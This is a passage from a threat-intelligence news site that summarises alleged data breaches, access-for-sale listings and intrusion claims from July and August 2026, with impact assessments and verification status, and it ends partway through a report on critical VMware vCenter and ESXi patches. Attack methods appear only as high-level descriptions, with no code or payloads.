names - Email addresses - Phone & mobile numbers - Home addresses - Supervisor field - Invoice identifiers - Subscription plans - Payment processor IDs - Billing email addresses - Due & unpaid dates - Payment status - Account status - Usernames - Review comments ### ◱Screenshot [ ![Waggle pet camera customer database leak forum post screenshot, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/2837695798239876235897987623547543.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/2837695798239876235897987623547543.png) ### ⚠Potential impact No passwords or card numbers appear, so account takeover is not the immediate risk. The concern is **what the product implies about the customer**. A home address on the customer list of an indoor pet camera marks a residence with **internet-connected cameras inside it**, and the alert-based nature of the product means many buyers leave pets alone at home. The **billing table sharpens the targeting**: unpaid and lapsed accounts identify customers primed to act on a message about a failed payment, and the invoice and processor references make such a message specific enough to pass scrutiny. Subscription lapse could also mean devices remaining online without active oversight. The claim is unverified. ### iStatus Unverified The post includes a record sample spanning the billing table, with entries dated to **late July 2026**, indicating a recent extraction if genuine. The **three-table structure is consistent with distinct application databases** rather than a single export, which would suggest broader access than one system. The account is established with substantial standing on the forum. Nothing has been independently corroborated. The claim is **unverified** and Waggle has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Silvi AI User Data Allegedly Exposed via API Flaw, 16,483 Researcher Records Published URL: https://darkwebinformer.com/silvi-ai-user-data-allegedly-exposed-via-api-flaw-16-483-researcher-records-published/ Last updated: 2026-07-31T19:55:19.000Z Breach Report ![Denmark flag](https://flagcdn.com/w40/dk.png)Denmark AI / Research Tools Point-Gated Download ## Silvi AI User Data Allegedly Exposed via API Flaw, 16,483 Researcher Records Published A forum user posting as **NightBroker** has published what they describe as the user database of **Silvi AI**, a Danish service that automates academic literature reviews. The release claims **16,483 records** containing names, email addresses, organisation identifiers, subscription status, and profile image references. The actor states the data was obtained not through a compromise of infrastructure but by abusing the platform's **public API**, describing an **unvalidated self-registration endpoint** followed by **sequential enumeration of user records** using the resulting token. If accurate, that describes a **broken object-level authorisation flaw** requiring no specialist tooling. The claim is **unverified**. Severity MODERATE Records16,483 VectorAPI authorisation PriceFree ActorNightBroker ### ▣Post details TargetSilvi AI Country![Denmark flag](https://flagcdn.com/w40/dk.png)Denmark SectorAI / Academic research tools ListingPoints to unlock Records16,483 users MethodClaimed API abuse, not intrusion ObservedJul 31, 2026 ActorNightBroker ### !Allegedly included - Email addresses - First names - Last names - User identifiers - Organisation identifiers - Subscription status - Profile image references ### ◱Screenshot [ ![Silvi AI Denmark research platform user data leak forum post screenshot, July 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/520873952397861293873456986723569876235.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/520873952397861293873456986723569876235.png) ### ⚠Potential impact The data itself is **limited**: names, emails, and subscription status, with no passwords, payment details, or research content. The exposure matters less for what was taken than for **how easily it was reportedly taken**. Broken object-level authorisation is the most common API weakness in the field, and a flaw of this kind **remains exploitable by anyone until it is fixed**, meaning the published set may not be the last. The user base appears to be **academics and institutional researchers**, whose addresses are useful for targeted phishing against universities. As a Danish operator, Silvi AI falls under GDPR notification obligations. ### iStatus Unverified The post includes a record sample and a detailed account of the method, which **Dark Web Informer is not reproducing** as the weakness may remain live. The account is established with moderate standing. The described technique is consistent with the fields obtained, which lends the account some internal coherence, but nothing has been independently corroborated. The claim is **unverified** and Silvi AI has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Buyer Solicits Corporate Network Access to $350M+ Western Firms, Excluding CIS, Schools and Hospitals URL: https://darkwebinformer.com/buyer-solicits-corporate-network-access-to-350m-western-firms-excluding-cis-schools-and-hospitals/ Last updated: 2026-07-31T17:11:57.000Z Access Wanted Multi-Region Initial Access Market Buyer Advertisement ## Buyer Solicits Corporate Network Access to $350M+ Western Firms, Excluding CIS, Schools and Hospitals A buyer posting as **umbreon** is advertising to purchase **corporate network access** on flat-rate terms, setting out unusually specific selection criteria. Targets must sit in the **US, Canada, UK, Switzerland, France, Australia, or Ireland** and hold **verified annual revenue above $350 million**, and the access must be exclusive and previously unsold. Accepted routes include **VPN, RDP, Citrix, VDI, RMM, Active Directory, and Entra, AWS, Okta or Oracle identity systems**. The buyer explicitly refuses **CIS-region targets, schools, and hospitals**, while stating that healthcare, pharmaceutical, and biotech companies are acceptable. No breach is claimed; this is a **demand-side listing**. Severity MODERATE Revenue floor$350M+ Regions7 Western ExcludesCIS states Actorumbreon ### ▣Listing details TypeBuying, not selling Regions soughtUS, CA, GB, CH, FR, AU, IE Revenue floor$350M+ verified TermsFlat-rate buyout, escrow ExclusivitySingle buyer, unsold only RefusedCIS, schools, hospitals ObservedJul 31, 2026 Actorumbreon ### !Access sought - VPN - RDP - Citrix - VDI - RMM platforms - Active Directory - Microsoft Entra - AWS - Okta - Oracle Identity Manager ### ◱Screenshot [ ![Initial access broker buying advertisement for corporate network access, July 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/257629857369872659876235265362.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/257629857369872659876235265362.png) ### ⚠Potential impact No organisation has been compromised here, but the criteria describe **who is being hunted**. A revenue floor screens for ability to pay rather than for data value, which is **ransomware victim selection** rather than data theft. The blanket **CIS exclusion** is the long-standing signature of Russian-speaking operations avoiding local prosecution. Refusing schools and hospitals while accepting pharmaceutical and biotech firms reflects **reputational risk management, not restraint**. The routes sought, particularly RMM and identity platforms, are chosen because they enable estate-wide deployment. Large Western firms in these sectors should read this as a statement of intent. ### iStatus Advertisement This is a solicitation rather than an incident, so there is nothing to verify beyond the post itself. The account was **created days ago with a single post**, though a purchased premium rank and the use of forum escrow convention suggest familiarity with the market. Dark Web Informer is not reproducing the contact identifier. Whether the buyer is operational or merely aspirational cannot be established. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Bacoor City Government Allegedly Breached, 57,000+ Business Permit Records Leaked With One-Week Ultimatum URL: https://darkwebinformer.com/bacoor-city-government-allegedly-breached-57-000-business-permit-records-leaked-with-one-week-ultimatum/ Last updated: 2026-07-31T15:51:14.000Z Hacktivist Leak ![Philippines flag](https://flagcdn.com/w40/ph.png)Philippines Government / Municipal Ultimatum Issued ## Bacoor City Government Allegedly Breached, 57,000+ Business Permit Records Leaked With One-Week Ultimatum An actor posting as **dopePanda** claims to have compromised the business permit database of the **Bacoor City Government** in Cavite, Philippines, releasing what they describe as **more than 57,000 records** covering permits, owner names, addresses, and phone numbers. Unlike most listings the motive stated is **political rather than financial**: the post objects to the confiscation of driving licences by city traffic enforcers and calls for the policy to be justified against national law. The actor claims **continuing access**, describes the release as a partial disclosure, and addresses the city mayor directly with a **seven-day deadline** before publishing the remainder. The claim is **unverified**. Severity HIGH Records57,000+ Deadline7 days MotivePolitical ActordopePanda ### ▣Post details TargetBacoor City Government Country![Philippines flag](https://flagcdn.com/w40/ph.png)Philippines SectorGovernment / Municipal ListingPartial leak, escalation threatened Records57,000+ business permits DemandPolicy change, no ransom ObservedJul 31, 2026 ActordopePanda + collective ### !Allegedly included - Business permit records - Permit numbers - Business owner names - Business addresses - Owner addresses - Phone numbers - Claimed ongoing system access - Further unreleased findings ### ◱Screenshots [ ![Bacoor City Government Philippines business permit database leak forum post screenshot, July 2026 (1 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/2378956978623459876239857978235987298735.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/2378956978623459876239857978235987298735.png) [ ![Bacoor City Government Philippines business permit database leak forum post screenshot, July 2026 (2 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/472839568762354987623598672359873.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/472839568762354987623598672359873.png) ### ⚠Potential impact Permit data is **partially public by nature**, which caps the sensitivity of any single record, but a consolidated file of every business owner in a city with names, addresses, and phone numbers is a different proposition from individual lookups. Sole proprietors frequently register at **home addresses**, so the set likely mixes residential detail into what reads as commercial data, and it maps which businesses exist, where, and who to call. The more significant element is the **claimed continuing access** and the explicit threat of a fuller release, which places the exposure in the future rather than the past. The claim is unverified. ### iStatus Unverified No sample records appear in the post, which is **weak substantiation for the volume claimed**, and the account holds no standing. The release is credited to several handles and a named collective. The post addresses the city mayor by name and includes a defaced image of him; **Dark Web Informer is not reproducing the accompanying rhetoric**. The deadline is stated as running from publication. The claim is **unverified** and the city government has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Baltas Online Allegedly Breached, 750+ Turkish Companies Exposed Through HR Assessment Vendor URL: https://darkwebinformer.com/baltas-online-allegedly-breached-750-turkish-companies-exposed-through-hr-assessment-vendor/ Last updated: 2026-07-31T15:30:28.000Z Breach Report ![Turkey flag](https://flagcdn.com/w40/tr.png)Turkey HR / Assessment Services Partial Leak + Sale ## Baltas Online Allegedly Breached, 750+ Turkish Companies Exposed Through HR Assessment Vendor An actor posting as **WInQ7wk9sA3a** claims to have held **root access for 47 days** to **Baltas Online**, a Turkish HR and assessment firm, and exfiltrated a **500GB+ archive** covering more than **750 corporate clients**. The post names major Turkish conglomerates, banks, telecoms, and airlines among them, along with **defence manufacturers** including a state-owned munitions producer. The claimed material includes **psychometric tests and personality assessments of C-level executives**, 700,000+ candidate profiles, exam PDFs with live answer keys, **interview audio and video recordings**, proctored exam photographs, off-record recruiter notes, and source code. Ten files were released free as proof, with the remainder offered for sale by client. The claim is **unverified**. Severity CRITICAL Client firms750+ Archive500GB+ Candidates700,000+ ActorWInQ7wk9sA3a ### ▣Post details TargetBaltas Online Country![Turkey flag](https://flagcdn.com/w40/tr.png)Turkey SectorHR / Talent assessment ListingFree sample, rest for sale AccessRoot, claimed 47 days Volume500GB+ / 10 files released ObservedJul 31, 2026 ActorWInQ7wk9sA3a ### !Allegedly included - Executive psychometric profiles - Personality assessments - 700k+ candidate profiles - 100k+ emails (4.5GB) - Exam papers (PDF) - Live answer keys - Interview audio recordings - Interview video recordings - Proctored exam photographs - Off-record recruiter notes - Client feedback records - Partner company contacts - Assessment methodology - Platform source code ### ◱Screenshots [ ![Baltas Online Turkey HR assessment firm data breach forum post screenshot, July 2026 (1 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/798623598762359876235987236598723.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/798623598762359876235987236598723.png) [ ![Baltas Online Turkey HR assessment firm data breach forum post screenshot, July 2026 (2 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/798623598762359876235987236598724.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/798623598762359876235987236598724.png) ### ⚠Potential impact One vendor breach exposes **750+ companies that were never themselves compromised**. The distinctive risk is not the volume but the nature of the material: **psychological profiles of named executives** at defence, banking, and telecoms firms describe stress responses, motivations, and weaknesses, which is precisely the material used for **coercion, recruitment, and social engineering** rather than ordinary fraud. The claimed inclusion of **defence contractor personnel** gives this a counterintelligence dimension. Interview recordings supply voice and likeness for impersonation, and live answer keys undermine hiring processes still in use. The claim is unverified. ### iStatus Unverified Ten sample archives were published as proof, which is **substantially more substantiation than most listings**, though the account is newly created with no standing. Dark Web Informer is **not reproducing the download links, client list, or contact routes**. Named client companies are the actor's claims and are victims of a supplier breach rather than their own. Nothing has been independently corroborated. The claim is **unverified** and Baltas Online has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Hungarian State Treasury Allegedly Compromised, Actor Claims vCenter and Identity Vault Access URL: https://darkwebinformer.com/hungarian-state-treasury-allegedly-compromised-actor-claims-vcenter-and-identity-vault-access/ Last updated: 2026-07-31T15:10:20.000Z Intrusion Claim ![Hungary flag](https://flagcdn.com/w40/hu.png)Hungary Government / Treasury Selective Sale ## Hungarian State Treasury Allegedly Compromised, Actor Claims vCenter and Identity Vault Access A threat actor posting as **bytetobreach** claims to have compromised the **Magyar Államkincstár**, Hungary's State Treasury, which administers state payments, pensions, family benefits, and EU funding. Rather than publishing records, the post presents **13 screenshots documenting a claimed intrusion chain**, with captions describing initial foothold, persistence, exposed **JDWP** and **Oracle WebLogic** services, movement across an **Active Directory forest trust**, access to an **Oracle Identity Manager vault**, endpoint security evasion, and finally **VMware vCenter takeover**. The actor states the data is **not for open sale and that no ransom has been demanded**. The claim is **unverified**. Severity CRITICAL Evidence13 screenshots Claimed depthvCenter Country![Hungary flag](https://flagcdn.com/w40/hu.png)Hungary Actorbytetobreach ### ▣Post details TargetMagyar Államkincstár Country![Hungary flag](https://flagcdn.com/w40/hu.png)Hungary SectorGovernment / Public finance ListingNot for open sale, no ransom Entry pointSubdomain via forest trust EvidenceScreenshots, no data sample ObservedJul 31, 2026 Actorbytetobreach ### !Claimed access - Initial foothold - Persistence established - Exposed JDWP service - Oracle WebLogic - AD forest trust crossing - Identity system access - Oracle Identity Manager vault - Service principal evaluation - Storage systems - Endpoint security evasion - VMware vCenter takeover - Historical records ### ◱Screenshot [ ![Hungarian State Treasury intrusion claim forum post screenshot, July 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/12937854692876359287656189764589712.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/12937854692876359287656189764589712.png) ### ⚠Potential impact This is an **intrusion claim rather than a data leak**, and the depth described is what matters. **vCenter controls the virtualisation layer**, meaning every hosted system rather than any single server, while an **identity manager vault** governs credentials across the estate. If accurate, remediation is not patching but rebuilding trust in the environment. The Treasury administers pensions, family benefits, and EU funds, so the affected population is effectively national. The claimed **forest trust crossing** also raises whether connected government domains were reachable. The claim is unverified. ### iStatus Unverified Evidence is **13 captioned screenshots and no data sample**, so scale cannot be assessed. The stated position, no ransom and no open sale, is unusual and leaves the motive unclear. This is the same actor behind a claimed breach of **Georgia's judiciary** weeks earlier. Mirrors and contact routes are withheld. The claim is **unverified** and the Treasury has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Broker Advertises Super Admin Access to Golden Tulip Bahrain FortiGate Firewall URL: https://darkwebinformer.com/broker-advertises-super-admin-access-to-golden-tulip-bahrain-fortigate-firewall/ Last updated: 2026-07-30T20:31:31.000Z Access Listing ![Bahrain flag](https://flagcdn.com/w40/bh.png)Bahrain Hospitality / Hotel Access for Sale ## Broker Advertises Super Admin Access to Golden Tulip Bahrain FortiGate Firewall A seller posting as **Roiese** is offering what they describe as full administrative access to the **FortiGate firewall and network security environment** of **Golden Tulip Bahrain**, a hotel property in Bahrain. The listing claims **super\_admin level control** across firewall policies, VPN and remote-access configuration, user and group administration, network objects, and API-based management, and enumerates **eight administrative accounts** said to hold that profile. Five screenshots of the management interface are attached as proof. The post is **formatted as a professional risk assessment**, including the seller's own severity rating and a profile of the target's revenue and headcount. The claim is **unverified**. Severity HIGH Access levelSuper admin Admin accounts8 listed Country![Bahrain flag](https://flagcdn.com/w40/bh.png)Bahrain ActorRoiese ### ▣Listing details TargetGolden Tulip Bahrain Country![Bahrain flag](https://flagcdn.com/w40/bh.png)Bahrain SectorHospitality / Hotel ListingAccess for sale, price on request EnvironmentFortiGate firewall Evidence5 interface screenshots ObservedJul 30, 2026 ActorRoiese ### !Advertised capabilities - Super\_admin profile access - Firewall policy modification - VPN configuration control - Remote-access management - Administrative account control - User & group administration - Application-control profiles - Network object visibility - Security architecture exposure - API-based administration ### ◱Screenshots [ ![Golden Tulip Bahrain FortiGate administrative access sale listing screenshot, July 2026 (1 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/8273895627364978265987623598769287365.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/8273895627364978265987623598769287365.png) [ ![Golden Tulip Bahrain FortiGate administrative access sale listing screenshot, July 2026 (2 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/8273895627364978265987623598769287366.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/8273895627364978265987623598769287366.png) ### ⚠Potential impact A firewall is not one system among many; it is the **boundary everything else sits behind**. Super\_admin on a FortiGate would expose the internal network layout and allow policy changes, and the **ability to create VPN accounts is the part that persists**, since credentials issued now survive remediation elsewhere. For a hotel, property management, booking, and payment systems sit inside that perimeter. Edge appliance access is the **standard opening move in ransomware intrusions**, which is what this listing is realistically sold for. The target is a single franchised property, not the wider brand. The claim is unverified. ### iStatus Unverified Five management-interface screenshots make this **better substantiated than most access listings**, though the account is a month old with no standing. Dark Web Informer is **not reproducing the administrative usernames** enumerated in the post, or the seller's contact channels. The risk-assessment framing is the seller's own marketing. The claim is **unverified** and Golden Tulip Bahrain has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### ExpoEmpleo Database Allegedly Leaked, 192,280 Uruguayan Job Seekers With National ID Numbers Exposed URL: https://darkwebinformer.com/expoempleo-database-allegedly-leaked-192-280-uruguayan-job-seekers-with-national-id-numbers-exposed/ Last updated: 2026-07-30T20:22:55.000Z Breach Report ![Uruguay flag](https://flagcdn.com/w40/uy.png)Uruguay Employment / Recruitment Free Download ## ExpoEmpleo Database Allegedly Leaked, 192,280 Uruguayan Job Seekers With National ID Numbers Exposed A forum user posting as **Sub21** has published what they describe as the database of **ExpoEmpleo**, a Uruguayan employment platform, covering registrations since around **2015**. The release claims **192,280 user records** in JSON Lines format, with per-field counts showing **189,781 DNI national identity numbers**, 125,168 dates of birth, 127,912 addresses, and more than 250,000 phone numbers across two fields. Also present are marital status, department of residence, nationality, and linked **Facebook, Twitter, and LinkedIn** handles. In the posted sample the **username field is the person's DNI number**. The actor describes the set as a full identity package and released it free. The claim is **unverified**. Severity CRITICAL Users192,280 DNI numbers189,781 PriceFree ActorSub21 ### ▣Post details TargetExpoEmpleo Country![Uruguay flag](https://flagcdn.com/w40/uy.png)Uruguay SectorEmployment / Recruitment ListingFree — reply or upgrade Records192,280 users RangeSince \~2015 ObservedJul 30, 2026 ActorSub21 ### !Allegedly included - DNI identity numbers - Document type - Full names (both surnames) - Dates of birth - Email & alternate email - Phone & mobile numbers - Home addresses - Department of residence - Marital status - Country of birth - Facebook handles - LinkedIn handles - Twitter handles - Availability for work ### ◱Screenshot [ ![ExpoEmpleo Uruguay job seeker database leak forum post screenshot, July 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/3278956978263498762349876253987239875.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/3278956978263498762349876253987239875.png) ### ⚠Potential impact **DNI, full name, date of birth, and home address together are the identity**, and none of it can be reissued after exposure. Because the username field carries the DNI, effectively every record includes one. At 192,280 people this represents **over five percent of Uruguay's population**, released free rather than sold. Job seekers are also a targeted population: recruitment fraud works on people expecting unsolicited contact about work, and the availability field marks who is actively looking. Birth dates in the sample indicate the set **likely includes people who registered as minors**. The claim is unverified. ### iStatus Unverified The post includes per-field record counts and a sample, which is more substantiation than most listings offer, though the account is **four days old with no standing**. The actor credits another handle and attributes the breach to weak security on the platform. Neither the counts nor the data have been independently corroborated. The claim is **unverified** and ExpoEmpleo has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Mercor Breached, Biometric Face and Voice Data on Every Registered User Offered for Sale URL: https://darkwebinformer.com/mercor-breached-biometric-face-and-voice-data-on-every-registered-user-offered-for-sale/ Last updated: 2026-07-29T19:31:14.000Z Breach Report ![United States flag](https://flagcdn.com/w40/us.png)United States AI / Talent Marketplace Data for Sale Confirmed ## Mercor Breached, Biometric Face and Voice Data on Every Registered User Offered for Sale A seller posting as **Resolute**, claiming to have acted alongside a group using the **Lapsus$** name, is advertising data from a complete compromise of **Mercor**, the US platform that recruits domain experts to produce training data for AI laboratories. The data includes **high-definition facial videos, voice recordings, biometric identifiers, and full personal data for every registered user**, across a **211GB database** also holding AI training material, plus **939GB of source code and cloud storage buckets**. Sample files, bucket trees, and source trees are linked from the post. The sale is one-time, via escrow. The breach has been **confirmed**. Severity CRITICAL Database211GB Code & buckets939GB Country![United States flag](https://flagcdn.com/w40/us.png)United States ActorResolute ### ▣Post details TargetMercor Country![United States flag](https://flagcdn.com/w40/us.png)United States SectorAI / Talent marketplace ListingOne-time sale, escrow, offers Volume211GB DB / 939GB code DataBiometric, PII, source, buckets ObservedJul 29, 2026 AttributionResolute, Lapsus$ claimed ### !What was taken - HD facial videos - Voice recordings - Biometric identifiers - Full personal data - Every registered user - AI training data - Platform source code - Cloud storage buckets - Bucket & source trees ### ◱Screenshot [ ![Mercor AI talent platform database breach sale listing screenshot, July 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/23579862349876124987621345987612498712.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/23579862349876124987621345987612498712.png) ### ⚠Potential impact **Biometric data cannot be reissued.** A breached password is replaced in minutes; a person's face and voice are permanent, and both were taken, at high definition, for every user on the platform. Paired with full identity data, that is the raw material for **synthetic impersonation** against a population of named professionals who work with AI laboratories, several of whom will hold access their employers would rather protect. The **source code and cloud buckets** extend the problem past the data itself, since either may contain credentials permitting continued access after remediation. ### iStatus Confirmed The breach has been **confirmed**. Three sample archives are linked from the post, which Dark Web Informer is not reproducing along with the contact routes. The **Lapsus$ attribution remains unconfirmed**, as the name has been reused widely since the original group's members were arrested, and the precise scope of the biometric holdings has not been independently established. Affected users should treat their face and voice data as permanently exposed. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### IPRO Customer Database Allegedly Leaked, 60,454 Records From Legal eDiscovery Platform Published URL: https://darkwebinformer.com/ipro-customer-database-allegedly-leaked-60-454-records-from-legal-ediscovery-platform-published/ Last updated: 2026-07-29T17:12:24.000Z Breach Report ![United States flag](https://flagcdn.com/w40/us.png)United States Legal Technology / eDiscovery Free Download ## IPRO Customer Database Allegedly Leaked, 60,454 Records From Legal eDiscovery Platform Published A forum user posting as **cozypandas** has published what they describe as the full customer database of **IPRO**, an eDiscovery platform used by law firms, corporations, and government agencies to manage data for litigation. The post claims **60,454 records** containing names, addresses, **NetSuite and Salesforce identifiers, and internal account data**, and asserts that **US Department of Justice agencies are among the accounts represented**. The release is credited to three handles and offered as a free download. In the same post the actor advertises separate services including the **forgery of court orders and the submission of fraudulent emergency disclosure requests**, which materially changes how this release should be read. The claim is **unverified**. Severity CRITICAL Records60,454 PriceFree Country![United States flag](https://flagcdn.com/w40/us.png)United States Actorcozypandas ### ▣Post details TargetIPRO Country![United States flag](https://flagcdn.com/w40/us.png)United States SectorLegal technology / eDiscovery ListingFree direct download Records60,454 claimed DataCustomer & account records ObservedJul 29, 2026 CreditedThree handles ### !Allegedly included - Customer names - Addresses - NetSuite identifiers - Salesforce identifiers - Internal account data - Law firm accounts - Corporate accounts - Government agency accounts - DoJ agencies (claimed) ### ◱Screenshot [ ![IPRO eDiscovery platform customer database leak forum post screenshot, July 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/1273895623865987263598723598766978234.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/1273895623865987263598723598766978234.png) ### ⚠Potential impact What is described is the vendor's **customer and account database, not the legal material held inside the platform**. Nothing indicates access to case files or privileged communications. The data would instead map **which law firms, corporations, and government bodies use the platform**, and how their accounts are structured. The **services advertised alongside it** are what elevate this: the same actor offers forged court orders and fraudulent emergency disclosure requests, a technique that works because platforms trust the requester's identity rather than a judge. A list of genuine government legal accounts is directly complementary to that. The claim is unverified. ### iStatus Unverified The post contains **no sample records and no proof material**, only a description and a hosted download, which Dark Web Informer is not reproducing along with the contact routes for the advertised services. The account holds minimal standing, though three handles are credited. The **Department of Justice claim is uncorroborated** and is the element most likely inflated. The claim is **unverified** and IPRO has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Broadcom Patches Critical VMware Flaws Enabling vCenter Authentication Bypass and ESXi VM Escape URL: https://darkwebinformer.com/broadcom-patches-critical-vmware-flaws-enabling-vcenter-authentication-bypass-and-esxi-vm-escape/ Last updated: 2026-07-29T16:11:57.000Z Broadcom has released emergency security updates for five vulnerabilities affecting VMware vCenter, ESX and ESXi, Workstation, Fusion, Cloud Foundation, vSphere Foundation, and several VMware Telco products. The July 29 release, tracked as [VMSA-2026-0006](https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/38017), includes two critical vCenter vulnerabilities that can be exploited remotely without authentication and a critical VM escape flaw that could allow code execution on an underlying ESXi host. Broadcom says it has no information indicating that any of the vulnerabilities have been exploited in the wild. However, there are no available workarounds, and the company classifies the updates as an emergency change requiring prompt action. ### Authentication Bypass Affects VMware vCenter The first critical vulnerability, CVE-2026-59309, is an authentication bypass issue in VMware Directory Service with a CVSS score of 9.8. An unauthenticated attacker with network access to vCenter could exploit the flaw to [bypass authentication and gain unauthorized access](https://cybersecuritynews.com/vmware-flaws-allow-authentication-bypass/) to the management system. Because vCenter provides centralized control over VMware environments, unauthorized access could expose administrative functions, infrastructure configurations, virtual machine inventories, credentials, and other sensitive management data. The vulnerability is present regardless of whether the environment uses Enhanced Linked Mode, Integrated Windows Authentication, or Active Directory integration. ### Syslog Flaw Can Lead to Remote Code Execution CVE-2026-59310 is a second critical vCenter vulnerability with a CVSS score of 9.8. The directory traversal flaw exists in the vCenter Syslog server and can allow a remote, unauthenticated attacker with network access to execute arbitrary code. Broadcom’s [supplemental security guidance](https://github.com/vmware/vcf-security-and-compliance-guidelines/tree/main/security-advisories/vmsa-2026-0006) confirms that both vCenter vulnerabilities can be exploited without first obtaining valid credentials. Organizations should install the following fixed vCenter versions or a newer cumulative release: VMware vCenter 9.1.0.0300 VMware vCenter 9.0.2.0100 VMware vCenter 8.0 Update 3k Updating vCenter briefly interrupts access to the vSphere Client and other management interfaces, but Broadcom says running virtual machine and container workloads will continue operating during the update. ### VMXNET3 Flaw Allows ESXi VM Escape The most serious ESXi-specific vulnerability is CVE-2026-47876, an out-of-bounds write in the VMXNET3 virtual network adapter. The flaw carries a CVSS score of 9.3 and can allow an attacker who already has local administrative privileges inside a virtual machine to [execute code on the underlying ESXi host](https://www.securityweek.com/critical-vm-escape-vulnerability-patched-in-vmware-esxi/). This crosses the security boundary separating a guest virtual machine from the hypervisor 